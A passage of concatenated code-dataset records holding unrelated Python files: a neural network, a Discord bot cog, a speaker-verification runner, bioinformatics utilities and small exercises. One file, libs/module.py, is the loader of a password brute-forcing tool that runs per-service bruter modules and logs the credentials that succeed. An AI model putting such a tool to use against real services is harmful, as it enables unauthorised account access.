Q.results['optim-minoutcome_final_default'].parset[1].pars[0]\n\nfor bp,bypop in enumerate(['total','bypop']):\n for key in ['optim-minoutcome_final_default', 'optim-minoutcome_final_KPeffiency']:\n tmp.results[key].export(bypop=bp, filestem=key+'-'+bypop)\n\nQ.parsets['curr'].pars[0] = currpars\nQ.parsets['optim'].pars[0] = optpars\n\n# Tests\n#copypars = ['condcom']\n#finepars = ['hivtest','condcas','numtx','numpmtct','sharing']\n#for p in copypars:\n# currpars[p] = origpars[p]\n# optpars[p] = origpars[p]\n\nQ.runsim(name='default')\nQ.runsim(name='curr')\nQ.runsim(name='optim')\n\ncomparepars(pars1=origpars, pars2=currpars)\nQ.results['all'] = Multiresultset([Q.results['parset-default'], Q.results['parset-curr'], Q.results['parset-optim']])\nplotresults(Q.results['all'])\n#plotpars([origpars, currpars, optpars])\n\nprint('Done')","sub_path":"colombia/troubleshootcolombia.py","file_name":"troubleshootcolombia.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"149207461","text":"# -*- coding: utf-8 -*-\n\nfrom discord.ext import commands\nimport asyncio\nimport discord\n\n\nclass fuckingHemlock(commands.Cog):\n \"\"\"\n\n Run tasks to keep welcome channel at top. For some reason Hemlock\n moves the last used ongoing raids channel as default.\n\n \"\"\"\n def __init__(self, bot):\n self.logger = bot.logger\n self.logger.info(f\"Loaded {self.__class__.__name__} cog\")\n self.bot = bot\n\n @commands.Cog.listener()\n async def on_guild_channel_create(self, channel):\n isRaidCat = discord.utils.find(\n lambda c: c.name.startswith(\"\\U0001f5bc\"), channel.category.channels\n )\n if isRaidCat:\n welcomeChannel = discord.utils.get(\n self.bot.get_all_channels(),\n guild__id=339074243838869504,\n name=\"welcome\",\n )\n await asyncio.sleep(1)\n await welcomeChannel.edit(position=0)\n\n @commands.Cog.listener()\n async def on_guild_channel_delete(self, channel):\n isRaidCat = discord.utils.find(\n lambda c: c.name.startswith(\"\\U0001f5bc\"), channel.category.channels\n )\n if isRaidCat:\n welcomeChannel = discord.utils.get(\n self.bot.get_all_channels(),\n guild__id=339074243838869504,\n name=\"welcome\",\n )\n await asyncio.sleep(1)\n await welcomeChannel.edit(position=0)\n\n\ndef setup(bot):\n bot.add_cog(fuckingHemlock(bot))\n","sub_path":"cogs/fuckinghemlock.py","file_name":"fuckinghemlock.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"124708396","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\n@Author: reber\n@Mail: reber0ask@qq.com\n@Date: 2019-09-25 23:57:35\n@LastEditTime: 2019-12-24 18:32:05\n'''\n\nimport time\nimport importlib\nfrom libs.mylog import MyLog\nfrom config import log_file_path\nfrom config import log_level\n\n\nlog_file = log_file_path.joinpath(\"{}.log\".format(time.strftime(\"%Y-%m-%d\", time.localtime())))\n\nclass LoadModule(object):\n \"\"\"LoadModule\"\"\"\n def __init__(self, args):\n super(LoadModule, self).__init__()\n self.service_type = args.get(\"service_type\")\n self.thread_num = args.get(\"thread_num\")\n self.timeout = args.get(\"timeout\")\n self.logger = MyLog(loglevel=log_level, logger_name=self.service_type, logfile=log_file)\n\n self.result = list()\n self.modules = list()\n\n def hook_msg(self, msg):\n status,host,port,user,pwd = msg\n if status:\n self.logger.error(\"[*] {} {} {} {}\".format(host, port, user, pwd))\n self.result.append((host, port, user, pwd))\n else:\n self.logger.info(\"[-] {} {} {} {}\".format(host, port, user, pwd))\n\n def load_module(self):\n \"根据 service_type 加载对应的模块\"\n fname = self.service_type\n self.logger.info(\"Start brute {} ...\".format(fname))\n module = importlib.import_module(\".\"+fname, package=\"modules\")\n module.hook_msg = self.hook_msg\n\n return module.bruter\n \n def start_brute(self,hpup):\n bruter = self.load_module()\n bruter(hpup, self.thread_num, self.timeout).run()\n\n return self.result\n","sub_path":"libs/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"462063188","text":"# -*- coding: utf-8 -*-\n'''\nAuthor: Rui Wang\nDate: 2021-01-27 22:56:05\nLastModifiedBy: Rui Wang\nLastEditTime: 2021-01-28 19:08:43\nEmail: wangru25@msu.edu\nFilePath: /ANN/ANN.py\nDescription: \n'''\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt \n\ndef read_dataset(feature_file, label_file):\n ''' Read data set in *.csv to data frame in Pandas'''\n df_X = pd.read_csv(feature_file)\n df_y = pd.read_csv(label_file)\n X = df_X.values # convert values in dataframe to numpy array (features)\n y = df_y.values # convert values in dataframe to numpy array (label)\n return X, y\n\n\ndef normalize_features(X_train, X_test):\n from sklearn.preprocessing import StandardScaler #import libaray\n scaler = StandardScaler() # call an object function\n scaler.fit(X_train) # calculate mean, std in X_train\n X_train_norm = scaler.transform(X_train) # apply normalization on X_train\n X_test_norm = scaler.transform(X_test) # we use the same normalization on X_test\n return X_train_norm, X_test_norm\n\n\ndef one_hot_encoder(y_train, y_test):\n ''' convert label to a vector under one-hot-code fashion '''\n from sklearn import preprocessing\n lb = preprocessing.LabelBinarizer()\n lb.fit(y_train)\n y_train_ohe = lb.transform(y_train)\n y_test_ohe = lb.transform(y_test)\n return y_train_ohe, y_test_ohe\n\n\nclass onelayer_NN:\n def __init__(self, X, y, hidden_layer_nn=100, lr=0.01):\n self.X = X # features\n self.y = y # labels (targets) in one-hot-encoder\n self.hidden_layer_nn = hidden_layer_nn # number of neuron in the hidden layer\n # In this example, we only consider 1 hidden layer\n self.lr = lr # learning rate\n # Initialize weights\n self.nn = X.shape[1] # number of neurons in the inpute layer\n self.W1 = np.random.randn(self.nn, hidden_layer_nn) / np.sqrt(self.nn)\n self.b1 = np.zeros((1, hidden_layer_nn)) # double parentheses\n self.output_layer_nn = y.shape[1]\n self.W2 = np.random.randn(hidden_layer_nn, self.output_layer_nn) / np.sqrt(hidden_layer_nn)\n self.b2 = np.zeros((1, self.output_layer_nn))\n \n \n def feed_forward(self):\n # hidden layer\n ## z_1 = xW_1 + b_1\n self.z1 = np.dot(self.X, self.W1) + self.b1\n ## activation function : f_1 = \\tanh(z_1)\n self.f1 = np.tanh(self.z1)\n # output layer\n ## z_2 = f_1W_2 + b_2\n self.z2 = np.dot(self.f1, self.W2) + self.b2 \n #\\hat{y} = softmax}(z_2)$\n self.y_hat = softmax(self.z2)\n \n def back_propagation(self):\n # $d_2 = \\hat{y}-y$\n d2 = self.y_hat - self.y\n # dL/dW2 = f_1^T d_2\n dW2 = np.dot(self.f1.T, d2)\n # dL/b_2 = d_2.dot(1)$\n db2 = np.sum(d2, axis=0, keepdims=True)\n # axis =0 : sum along the vertical axis\n # d_1 = (1-f^2_1)(\\hat{y}-y)W_2^T\n d1 = (1-self.f1*self.f1)*(d2.dot((self.W2).T))\n # dL/dW_1} = x^T d_1\n dW1 = np.dot((self.X).T, d1)\n # dL/db_1 = d_1\n db1 = np.sum(d1, axis=0, keepdims=True)\n \n # Update the gradident descent\n self.W1 = self.W1 - self.lr * dW1\n self.b1 = self.b1 - self.lr * db1\n self.W2 = self.W2 - self.lr * dW2\n self.b2 = self.b2 - self.lr * db2\n \n def cross_entropy_loss(self):\n # $L = -\\sum_n\\sum_{i\\in C} y_{n, i}\\log(\\hat{y}_{n, i})$\n # calculate y_hat\n self.feed_forward()\n self.loss = -np.sum(self.y*np.log(self.y_hat + 1e-6))\n \n def predict(self, X_test):\n # Use feed forward to calculat y_hat_test\n # hidden layer\n ## z_1 = xW_1 + b_1\n z1 = np.dot(X_test, self.W1) + self.b1\n ## activation function : f_1 = \\tanh(z_1)\n f1 = np.tanh(z1)\n # output layer\n ## z_2 = f_1W_2 + b_2\n z2 = np.dot(f1, self.W2) + self.b2 \n #\\hat{y} = softmax}(z_2)$\n y_hat_test = softmax(z2)\n # the rest is similar to the logistic regression\n labels = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n num_test_samples = X_test.shape[0]\n # find which index gives us the highest probability\n ypred = np.zeros(num_test_samples, dtype=int) \n for i in range(num_test_samples):\n ypred[i] = labels[np.argmax(y_hat_test[i,:])]\n return ypred\n \ndef softmax(z):\n exp_value = np.exp(z-np.amax(z, axis=1, keepdims=True)) # for stablility\n # keepdims = True means that the output's dimension is the same as of z\n softmax_scores = exp_value / np.sum(exp_value, axis=1, keepdims=True)\n return softmax_scores\n\ndef accuracy(ypred, yexact):\n p = np.array(ypred == yexact, dtype = int)\n return np.sum(p)/float(len(yexact))\n \n# main\nX_train, y_train = read_dataset('Digits_X_train.csv', 'Digits_y_train.csv')\nX_test, y_test = read_dataset('Digits_X_test.csv', 'Digits_y_test.csv')\nX_train_norm, X_test_norm = normalize_features(X_train, X_test)\ny_train_ohe, y_test_ohe = one_hot_encoder(y_train, y_test)\n# \nmyNN = onelayer_NN(X_train_norm, y_train_ohe, hidden_layer_nn=200, lr=0.1) \nepoch_num = 200\nfor i in range(epoch_num):\n myNN.feed_forward()\n myNN.back_propagation()\n myNN.cross_entropy_loss()\n if ((i+1)%20 == 0):\n print('epoch = %d, current loss = %.5f' % (i+1, myNN.loss)) \n \ny_pred = myNN.predict(X_test_norm)\nprint('Accuracy of our model ', accuracy(y_pred, y_test.ravel()))","sub_path":"Deeplearning_tutorial/ANN/ANN.py","file_name":"ANN.py","file_ext":"py","file_size_in_byte":5440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"475483157","text":"cards = [{\"name\":\"尹天\",\"age\":20},{\"name\":\"豪哥\",\"age\":20},{\"name\":\"崔健\",\"age\":18}]\n\nfor i in cards:\n\tfor k,v in i.items():\n\t\tprint(\"%s:%s\"%(k,v))\n\n\nd = {}\nd[\"name\"] = \"xiaoyuan\"\ncards.append(d)\nprint(cards)\t\n","sub_path":"00源哥代码.py/3-test/11day/8-列表和字典嵌套.py","file_name":"8-列表和字典嵌套.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"217576139","text":"import os\nimport json\nimport argparse\nimport configparser\nimport warnings\nimport datetime\nfrom ge2e import *\nwarnings.simplefilter(action='ignore', category=FutureWarning)\n\n# arguments\n# ckpt example : '/path/to/your/ckpt/cp-{:06d}.ckpt'\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--mode\")\nparser.add_argument(\"--ckpt\",default='/mnt/data1/sunkist/data/sv_ckpt/kor_8k/cp-{:06d}.ckpt')\nparser.add_argument(\"--infer_json\",default='')\nparser.add_argument(\"--wavdir\",default='')\nparser.add_argument(\"--emb_savedir\",default='/mnt/data1/sunkist/data/kor_cln_test_emb')\nargs = parser.parse_args()\n\ndef get_data_list(data_type, root_dir=''):\n datalist = []\n if data_type == \"wav\":\n if root_dir:\n datalist = glob.glob(root_dir+'/*wav')\n elif data_type == \"mel\":\n if root_dir:\n datalist = glob.glob(root_dir+'/*npy') #?\n elif data_type == \"testset\":\n with open(os.path.join(os.path.dirname(__file__),'path_index_test.json'), 'r') as f:\n utts = json.load(f)['utts']\n for spk in utts.keys():\n datalist.extend(utts[spk])\n return datalist\n\nif __name__ == \"__main__\":\n mode = args.mode\n ckpt_to_load = args.ckpt\n\n # config\n CONFIG_FILE = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir, 'config', 'config.json'))\n with open(CONFIG_FILE, 'rb') as fid:\n config = json.load(fid)\n # config 읽어와서 후처리\n config[\"write_wavname\"] = bool(config[\"write_wavname\"])\n config[\"random_segment\"] = bool(config[\"random_segment\"])\n config[\"multiprocessing\"] = bool(config[\"multiprocessing\"])\n config[\"preprocess_multiprocessing\"] = bool(config[\"preprocess_multiprocessing\"])\n\n if mode == \"training\":\n sv = Speaker_verification(config,\"train\")\n elif mode == \"inference\":\n sv = Speaker_verification(config,\"infer\")\n elif mode == \"evaluation\":\n sv = Speaker_verification(config,\"infer\")\n elif mode == \"exporting\":\n sv = Speaker_verification(config,\"export\")\n\n\n if mode == \"train\":\n sv._run()\n elif mode == \"infer\":\n emb_savedir= args.emb_savedir\n\n if not os.path.exists(emb_savedir):\n os.makedirs(emb_savedir)\n\n wavepath_list = get_data_list(\"wav\", args.wavdir)\n # process wav & infer\n sv._process_and_infer(config,emb_savedir,ckpt_to_load,wavpath_list)\n\n elif mode == \"evaluation\":\n evaluation_info = []\n emb_savedir= args.emb_savedir\n\n if not os.path.exists(emb_savedir):\n os.makedirs(emb_savedir)\n\n mellist = get_data_list(\"testset\")\n\n for i in range(79,6060):\n each_checkpoint = ckpt_to_load.format(i)\n # process mel & infer\n timenow, num_epoch, eer = sv._infer_mels(config,emb_savedir,each_checkpoint,mellist)\n evaluation_info.append([timenow, num_epoch, eer])\n \n for item in evaluation_info:\n print(f\"[{item[0]}] EPOCH : {item[1]}, EER : {eer}\")\n\n elif mode == \"exporting\":\n sv._export(ckpt_to_load)\n","sub_path":"Speaker_Verification/src/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"635643515","text":"#!/usr/bin/env python \n# -*- coding:utf-8 _*- \n# Author: Wengs\n# Time : 2/20/2019 10:06 PM \n# File : user.py \n# IDE : PyCharm\n\nuser_0 = {\n 'username': 'wengsway',\n 'first': 'quan',\n 'last': 'weng'\n}\nfor key, value in user_0.items():\n print(\"\\nkey: \" + key)\n print(\"Value: \" + value)\n","sub_path":"chapter_6/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"345519726","text":"import requests\nimport smtplib\n\nfrom twilio.rest import TwilioRestClient\nfrom bs4 import BeautifulSoup\n\n\naccountSID = '***'\nauthToken = '***'\ntwilioCli = TwilioRestClient(accountSID, authToken)\nmyTwilioNumber = '***'\nmyCellPhone = '***'\n\n\n\nr = requests.get('https://www.usask.ca/culinaryservices/foodmenu/')\n\nsoup = BeautifulSoup(r.content)\n\nmenu = soup.get_text()\n\nPerogies = \"Perogies and Onions\"\n\nif (menu.find(Perogies) != -1):\n\tmessage = twilioCli.messages.create(body='There are Perogies today!', from_=myTwilioNumber, to=myCellPhone)\n\n\n","sub_path":"perogies.py","file_name":"perogies.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"570309097","text":"board = [list(map(int, input().split())) for _ in range(10)]\ni = j = 1\n\nwhile True:\n # 도착했을 때 값이 2이면 값을 9로 바꿔주고 종료\n if board[i][j] == 2:\n board[i][j] = 9\n break\n # 도착했을 때 그 공간이 테두리 이면 종료\n elif i == 9 or j == 9:\n break\n\n # 도착 후 위에 해당사항 없으면 값을 9로 수정\n board[i][j] = 9\n # 값 수정후 오른쪽 값을 조회해 0이면 오른쪽, 1이면 아래, 2면 오른쪽 값을 9로 수정후 종료\n if board[i][j + 1] == 0:\n j += 1\n elif board[i][j + 1] == 1:\n i += 1\n else:\n board[i][j + 1] = 9\n break\n\nfor i in range(10):\n for j in range(10):\n print(board[i][j], end=' ')\n print()","sub_path":"6081~6098/6098.py","file_name":"6098.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"270265124","text":"from bitpermissions import Permissions, PermissionException\nimport inspect\n\n\ndef get_props(object_):\n \"\"\"\n :return: List of properties to test\n \"\"\"\n # get properties\n prop_list = inspect.getmembers(object_, predicate=inspect.isdatadescriptor)\n # remove weakref and permissions\n remove_list = ['__weakref__', 'permissions']\n property_list = []\n for i, property in enumerate(prop_list):\n # compare property name not the object itself\n if property[0] in remove_list:\n pass\n else:\n property_list.append(property[0])\n return property_list\n\n\nsamurai = ['samurai', 'jack', 'back', 'to', 'the', 'past']\n\n\ndef test_negative_one_input():\n all_perms = Permissions(samurai, perm_rights=-1)\n assert all_perms.permissions == 2**all_perms._num_of_rights - 1\n\n\ndef test_remove_all():\n all_perms = Permissions(samurai, perm_rights=-1)\n for right_name in get_props(all_perms):\n right = getattr(all_perms, right_name)\n assert right\n right = False\n assert not right\n\n\ndef test_add_all():\n no_perms = Permissions(samurai, perm_rights=0)\n for right_name in get_props(no_perms):\n right = getattr(no_perms, right_name)\n assert not right\n right = True\n assert right\n\n\nclass TestMultipleInstances():\n\n def test_has_functions(self):\n self.a = Permissions(['a'], perm_rights=-1)\n self.b = Permissions(['b'], perm_rights=-1)\n\n try:\n self.a.has_a()\n except AttributeError:\n raise RuntimeError(\"Instance 'a' doesn't have method 'has_a'.\")\n\n try:\n self.a.has_b()\n except AttributeError:\n print(\"Instance 'a' doesn't have method 'has_b'\")\n else:\n raise RuntimeError(\"Instance 'a' has method 'has_b'\")\n\n def test_properties(self):\n try:\n print(self.a.b)\n except AttributeError:\n print(\"'a' instance wasn't affected by 'b' instance\")\n else:\n raise RuntimeError(\"'a' instance had 'b' instance's attribute!\")\n\n\nclass TestPerms():\n\n def test_on_and_off_and_on_and_off_again(self):\n self.perms = Permissions(samurai, perm_rights=0)\n self.has_perm = self.perms.__getattribute__('has_' + samurai[0])\n\n self._on()\n self._off()\n self._on()\n self._off()\n self._on()\n self._on()\n self._off()\n self._off()\n\n def _on(self):\n setattr(self.perms, samurai[0], True)\n assert getattr(self.perms, samurai[0])\n self.has_perm()\n\n def _off(self):\n setattr(self.perms, samurai[0], False)\n assert not getattr(self.perms, samurai[0])\n try:\n self.has_perm()\n except PermissionException:\n print('Correct exception raised')\n else:\n raise RuntimeError(\"There was no PermissionException when there should have been!\")\n","sub_path":"tests/permissions_test.py","file_name":"permissions_test.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"65735473","text":"'''\nAuthor: Rosina Savisaar and Liam Abrahams.\nModule that contains generic utility functions that make life a bit easier.\n'''\n\nimport argparse\nimport csv\nimport ftplib\nimport itertools as it\nimport multiprocessing\nimport numpy as np\nimport os\nimport random\nimport re\nimport shutil\nimport subprocess\nimport time\n\ndef blast_all_against_all(db_name, fasta_file_name, output_file_name, blast_db_path):\n '''\n Blast all the sequences in a fasta file against each-other.\n '''\n run_process([\"makeblastdb\", \"-in\", fasta_file_name, \"-out\",\n \"{0}/{1}\".format(blast_db_path, db_name),\n \"-dbtype\", \"nucl\"])\n run_process([\"blastn\", \"-task\", \"blastn\", \"-query\", fasta_file_name,\n \"-db\", \"{0}/{1}\".format(blast_db_path, db_name),\n \"-out\", output_file_name, \"-outfmt\", \"10\", \"-evalue\", \"1e-04\", \"-num_threads\", str(int((os.cpu_count()/2)-1))])\n\ndef calc_eff_p(real_value, sim_values, greater = True):\n '''\n Given an estimate and a series of simulated estimates, calculate and empirical effective p-value.\n If greater is True, calculate the porbbaility that a value this great or greater would have been observed by chance,\n otherwise that a value this low or lower would have been observed.\n '''\n if real_value == None or np.isnan(real_value):\n return(None)\n sim_values = [i for i in sim_values if i != None and not np.isnan(i)]\n if greater:\n more_extreme = [i for i in sim_values if i >= real_value]\n else:\n more_extreme = [i for i in sim_values if i <= real_value]\n n = len(more_extreme)\n m = len(sim_values)\n p = (n + 1)/(m + 1)\n return(p)\n\ndef create_directory(path):\n '''\n Create new directory if doesn't already exist\n '''\n if not os.path.exists(path):\n os.makedirs(path, exist_ok=True)\n\ndef create_strict_directory(path):\n '''\n Remove directory if exists, create new directory\n '''\n if os.path.exists(path):\n shutil.rmtree(path)\n os.mkdir(path)\n\ndef create_output_directories(path):\n '''\n Create set of directories for a given path\n '''\n path_splits = path.split('/')\n new_path = []\n for i, split in enumerate(path_splits):\n new_path.append(split)\n create_directory(\"/\".join(new_path))\n\ndef create_strict_output_directories(path):\n '''\n Create set of directories for a given path\n '''\n path_splits = path.split('/')\n new_path = []\n for i, split in enumerate(path_splits):\n new_path.append(split)\n create_strict_directory(\"/\".join(new_path))\n\n\ndef copy_file(src, dest):\n shutil.copyfile(src, dest)\n\ndef extend_family(blast_results, families, query):\n '''\n Given a gene identifier (query), find all genes that are connected to it\n in the BLAST results (i.e. one is a hit for the other). Add them to the current family and remove\n the relevant lines from the BLAST results.\n '''\n to_add = [i for i in blast_results if query in i]\n blast_results = [i for i in blast_results if query not in i]\n to_add = flatten(to_add)\n families[-1].extend(to_add)\n families[-1] = list(set(families[-1]))\n return(blast_results, families)\n\ndef extract_head_of_file(file_path, lines):\n '''\n Extract a certain number of lines from file\n '''\n output_path = \".\".join(file_path.split('.')[:-1]) + '.extracted.{}.'.format(lines) + file_path.split('.')[-1]\n remove_file(output_path)\n with open(file_path, 'r') as file:\n head = list(it.islice(file, lines))\n with open(output_path, 'w') as output_file:\n for line in head:\n output_file.write(line)\n\ndef find_families(fasta_file_name, output_prefix, blast_db_path, descriptions_file):\n '''\n Given a fasta file, group the sequences into paralogous families.\n '''\n blast_results_file_name = \"{0}_blast_results\".format(output_prefix)\n output_prefix_short = output_prefix.split(\"/\")\n output_prefix_short = output_prefix_short[-1]\n #run a BLAST all against all for the sequences in the fasta file\n blast_all_against_all(\"{0}_blast_db\".format(output_prefix_short), fasta_file_name, blast_results_file_name, blast_db_path)\n names, seqs = read_fasta(fasta_file_name)\n\n #create an empty list for storing the indices of BLAST query - hit pairs to delete\n #open a .csv file containing the results of a BLAST and turn it into a list\n #delete all of the information except the identifiers of queries and hits\n #identify those pairs where the query and the hit come from the same sequence and delete them\n to_delete = []\n with open(blast_results_file_name) as csvfile:\n blast_results = csv.reader(csvfile, delimiter=',')\n blast_results = list(blast_results)\n print(\"Total number of BLAST hits.\")\n print(len(blast_results))\n for i in blast_results:\n del i[2:12]\n if i[0] == i[1]:\n to_delete.append(i)\n print(\"Elements to delete:\")\n print(len(to_delete))\n print(\"Unique elements to delete:\")\n print(len(list(set(flatten(to_delete)))))\n for i in list(reversed(to_delete)):\n blast_results.remove(i)\n\n print(\"Number of results without self-matches:\")\n print(len(blast_results))\n queries = [i for i,j in blast_results]\n print(\"Number of queries:\")\n print(len(queries))\n print(\"Number of unique queries:\")\n print(len(list(set(queries))))\n matches = [j for i,j in blast_results]\n print(\"Number of matches:\")\n print(len(matches))\n print(\"Number of unique matches:\")\n print(len(list(set(matches))))\n\n print(\"Genes that don't overlap between queries and matches:\")\n for i in list(set(queries)):\n if i not in list(set(matches)):\n print(i)\n for i in list(set(matches)):\n if i not in list(set(queries)):\n print(i)\n\n #create an empty list for storing the gene families, another for storing the genes\n #that have already been analyzed within a family and a third one for storing all\n #the genes that have been analyzed across all families.\n #create a counter (fcounter) for storing the number of families that have been created\n #while there are query-hit pairs left,\n #add genes seen in the previous family to the list of all genes analyzed and then empty the\n #first list for the next family\n #pick a random query out of the remaining query-hit pairs and create a new family containing\n #just that query. This is now the current family. Increment fcounter by 1.\n #add all genes that are either hits to the current query or that the current query is a hit to\n #into the current family.\n #loop over all the genes in the current family and add everything they match or are a match\n #to into the current family\n #once you've done all the genes in a family, pick a new random query from the query-hit pairs\n #that are left and start a new family with it\n families = []\n added_something = True\n while len(blast_results) > 0:\n seen = []\n current_pair = random.choice(blast_results)\n families.append(current_pair)\n while added_something:\n length_before = len(families[-1])\n for query in families[-1]:\n if query not in seen:\n seen.append(query)\n [blast_results, families] = extend_family(blast_results, families, query)\n if(len(families[-1])) == length_before:\n added_something == False\n break\n\n families_file_name = \"{0}_families.txt\".format(output_prefix)\n families_descriptions_file_name = \"{0}_families_descriptions.txt\".format(output_prefix)\n descriptions = read_many_fields(descriptions_file, \"\\t\")\n descriptions = list_to_dict(descriptions, 0, 1)\n families_file = open(families_file_name,\"w\")\n with open(families_descriptions_file_name, \"w\") as fd_file:\n for family in families:\n families_file.write(\"{0}\\n\".format(\",\".join(family)))\n fd = [descriptions[i] for i in family]\n fd_file.write(\"{0}\\n\".format(\",\".join(fd)))\n\n #create flat version of the families list so you could count the total number of genes that have been allocated to a family\n flat_families = flatten(families)\n\n #these two numbers should be identical\n print(\"Number of genes in families:\")\n print(len(flat_families))\n print(\"Number of unique genes in families:\")\n print(len(list(set(flat_families))))\n\n #create a list with the sizes of all the different families\n family_sizes = [len(i) for i in families]\n print(\"Number of families:\")\n print(len(families))\n print(\"Distribution of family sizes:\")\n print(sorted(family_sizes))\n\n #close the output file\n families_file.close()\n\ndef find_families_ensembl(ensembl_file, transcript_IDs, out_file):\n '''\n Extract family data from a file with Ensembl protein families data.\n '''\n family_data = read_many_fields(ensembl_file, \"\\t\")\n family_data = [i for i in family_data if len(i[2]) > 0 and i[1] in transcript_IDs]\n #this is done so there'd be a more human-readable version of the families file\n #the descriptions file is not for downstreama analysis\n family_data_desc = list_to_dict(family_data, 2, 4, as_list = True)\n family_data_desc = {i: family_data_desc[i] for i in family_data_desc if len(family_data_desc[i]) > 1}\n family_data = list_to_dict(family_data, 2, 1, as_list = True)\n family_data = {i: family_data[i] for i in family_data if len(family_data[i]) > 1}\n desc_file = \"{0}_descriptions.txt\".format(out_file.split(\".\")[0])\n with open(out_file, \"w\") as o_file, open(desc_file, \"w\") as d_file:\n for family in sorted(family_data):\n o_file.write(\",\".join(family_data[family]))\n o_file.write(\"\\n\")\n d_file.write(\",\".join(family_data_desc[family]))\n d_file.write(\"\\n\")\n\ndef flatten(structured_list):\n '''\n Flatten a structured list.\n '''\n flat_list = list(it.chain(*structured_list))\n return(flat_list)\n\ndef ftp_check(ftp, host, user, password, pwd):\n '''\n Pings the FTP server to make sure the connection is live,\n reconnects if it isn't.\n '''\n try:\n #ping server\n ftp.voidcmd(\"NOOP\")\n return(ftp)\n #if connection has timed out\n except ftplib.error_temp:\n #reconnect\n ftp = ftp_connect(host, user, password, directory = pwd)\n return(ftp)\n\ndef ftp_connect(host, user, password, directory = None):\n '''\n Connect to FTP server.\n directory: if specified, change to that directory.\n '''\n connected = False\n while not connected:\n try:\n ftp = ftplib.FTP(host, timeout = 10000)\n connected = True\n except TimeoutError:\n print(\"TimeoutError! Trying again...\")\n ftp.login(user, password)\n if directory:\n ftp.cwd(directory)\n return(ftp)\n\ndef ftp_retrieve(ftp, host, user, password, directory, file_name, destination = None):\n '''\n Retrieve one or several files from an FTP site.\n Meant to be given a live FTP connection, with the correct working directory, but still needs information to connect in case there is a timeout.\n directory: source directory on the FTP site (only used in case of timeout)\n file: name of file to retrieve\n destination: save the file to this location. If unspecified, the current working directory will be used.\n '''\n if destination:\n #this is to make it easier to join the directory path with a file name\n destination = \"{0}/\".format(destination)\n else:\n destination = \"\"\n local_file_name = \"{0}{1}\".format(destination, file_name)\n #it's this complicated because you want to be able to retrieve binary data\n with open(local_file_name, \"wb\") as local_file:\n #check that the connection is live, reconnect otherwise\n ftp = ftp_check(ftp, host, user, password, directory)\n retrieved = False\n #sometimes the file doesn't transfer properly so you have to keep on\n #trying till you get it\n while not retrieved:\n try:\n ftp.retrbinary(\"RETR {0}\".format(file_name), local_file.write)\n retrieved = True\n except EOFError:\n print(\"EOFError! Trying again...\")\n pass\n except TimeoutError:\n print(\"TimeoutError! Trying again...\")\n ftp = ftp_check(ftp, host, user, password, directory)\n print(\"Retrieved file {0}.\".format(file_name))\n return(ftp)\n\ndef get_extension(file_name, extension_length, valid_list = None):\n '''\n Determine the extension at the end of a file name.\n file_name: name of the file\n extension_length: expected length of extension\n valid_list: if supplied, the extension must be one of the ones specified in this list\n EX: get_extension(\"test.jpg\", 3, valid_list = [\"jpg\", \"gif\", \"png\"]) would return \"jpg\"\n '''\n extension = file_name[-extension_length:]\n if valid_list:\n if extension not in valid_list:\n print(\"File format must be included in {0}!\".format(valid_list))\n raise Exception\n return(extension)\n\ndef get_time(start_time):\n '''\n Print out how many minutes have passed since start_time.\n '''\n current = time.time()\n spent = round((current - start_time)/60, 2)\n print(\"{0} minutes.\\n\".format(spent))\n\ndef line_count(file):\n '''\n Count the number of lines in a file.\n '''\n #not using wc -l because I want the number of lines, not the number of newlines.\n output = run_process([\"grep\", \"-c\", \"^\", file])\n return(int(output))\n\ndef list_to_dict(input_list, index1, index2, as_list = False, uniquify = False, floatify = False):\n '''\n Convert the input_list into a dictionary, with the index1th element of each sublist as the key and the index2th element as the value.\n '''\n if as_list and floatify:\n print(\"_as_list_ and _floatify_ can't both be True!\")\n raise Exception\n output_dict = {}\n for i in input_list:\n if not as_list:\n if floatify:\n output_dict[i[index1]] = float(i[index2])\n else:\n output_dict[i[index1]] = i[index2]\n else:\n if i[index1] not in output_dict:\n output_dict[i[index1]] = []\n output_dict[i[index1]].append(i[index2])\n if as_list and uniquify:\n output_dict = {i: sorted(list(set(output_dict[i]))) for i in output_dict}\n return(output_dict)\n\ndef motif_to_regex(motifs):\n '''\n Convert a string into a lookahead regex where only the first base\n is matched and the rest is in the lookahead.\n '''\n regex = [re.compile(\"\".join([i[0],\"(?=\",i[1:],\")\"])) for i in motifs]\n return(regex)\n\ndef parse_arguments(description, arguments, floats = None, flags = None, ints = None):\n '''\n Use argparse to parse a set of input arguments from the command line.\n '''\n if not floats:\n floats = []\n if not flags:\n flags = []\n if not ints:\n ints = []\n parser = argparse.ArgumentParser(description = description)\n for pos, argument in enumerate(arguments):\n if pos in flags:\n parser.add_argument(\"--{0}\".format(argument), action = \"store_true\", help = argument)\n else:\n if pos in floats:\n curr_type = float\n elif pos in ints:\n curr_type = int\n else:\n curr_type = str\n parser.add_argument(argument, type = curr_type, help = argument)\n args = parser.parse_args()\n return(args)\n\ndef read_families(file):\n '''\n Read a families file (one family of paralogous genes per line, the member genes separated by commas) into a list,\n with each sublist containing the 